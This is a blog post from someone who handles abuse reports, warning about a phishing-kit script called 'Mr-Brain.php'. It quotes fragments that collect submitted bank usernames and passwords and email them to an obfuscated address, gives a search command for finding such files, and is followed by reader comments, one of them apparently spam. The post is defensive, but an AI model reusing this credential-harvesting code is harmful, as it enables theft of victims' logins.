Watch out for “Mr-Brain.php” – phishing script

As well as my normal development duties I deal with some of the incoming abuse reports at work, and recently I’ve dealt with a number of phishing sites which submit data to a script named “Mr-Brain.php”. A quick Google showed no useful results, so I’m posting about it here.

The script gathers the details submitted by the phishing site and emails them off. The actual file seems to change a bit for each spam.

Tell-tail bits from one of them:


$message .= "--------------HaLiFaX UK Bank Spam ReZulT-----------------------\n";
$message .= "Username: ".$_POST['Username']."\n";
$message .= "Password: ".$_POST['Password']."\n";
[..... removed some lines for brevity.....]
$message .= "---------------Created By yassine.h01------------------------------\n";

It also makes a pretty laughable attempt to hide what email address it’s really sending the info to, by picking characters out of an array:


$ar=array("0"=>"3","1"=>"a","2"=>"w","3"=>"l","4"=>"d","5"=>"i","6"=>"@","7"=>".","8"=>"y","9"=>"h","10"=>"o","11"=>"c","12"=>"m");
$to=$ar['1'].$ar['2'].$ar['2'].$ar['3'].$ar['4'].$ar['5'].$ar['0'].$ar['0'].$ar['0'].$ar['6'].$ar['8'].$ar['1'].$ar['9'].$ar['10'].$ar['10'].$ar['7']
.$ar['11'].$ar['10'].$ar['12'];

… because that will really stop anyone with half a clue seeing what’s going on.

Might well be worth searching your servers for any files named “Mr-Brain.php” as a quick way to locate phishing attempts. A quick find / -name Mr-Brain.php will get you a list of any dodgy sites being hosted, quickly and easily.

A quick Google for “yassine.h01” returned a site hosting a large list of pre-made phishing sites… just unzip, change the Mr-Brain.php file with your address, and upload. Reported it, but it’s a Russian host, so not holding my breath.

Have any info to add? Go ahead and leave a comment (please!).

7 thoughts on “Watch out for “Mr-Brain.php” – phishing script”

  1. Another similar looking script I found was named Sitekey.php which was part of a Bank of America phishing site… it looks like it’s either made by the same person, or just modified by someone. It contains “Created By xXMr_SpAmErSxX” in the mail it sends.

    I also saw one called log.php which it seems is designed to steal Hotmail cookies, containing “abdullah00” and “By Mr.ALJoOoKeR”.

  2. Still seeing more Mr-Brain.php scripts, often with different “Created By” lines, including:
    —————Created BY Mr-c/qadir——————————

  3. Update: Googling for “yassine.h01” no longer returns the site hosting pre-made phishing sites, so maybe the host acted on the report and took it down.

  4. Identity theft is certainly a very real thing to deal with and the internet only makes it easier to become a victim. Email phishing scams are everywhere and most people can’t tell the difference between a real site and the fake one. I found this new resource called ShopShield.net. Check it out they protect your identity while you are online.

Comments are closed.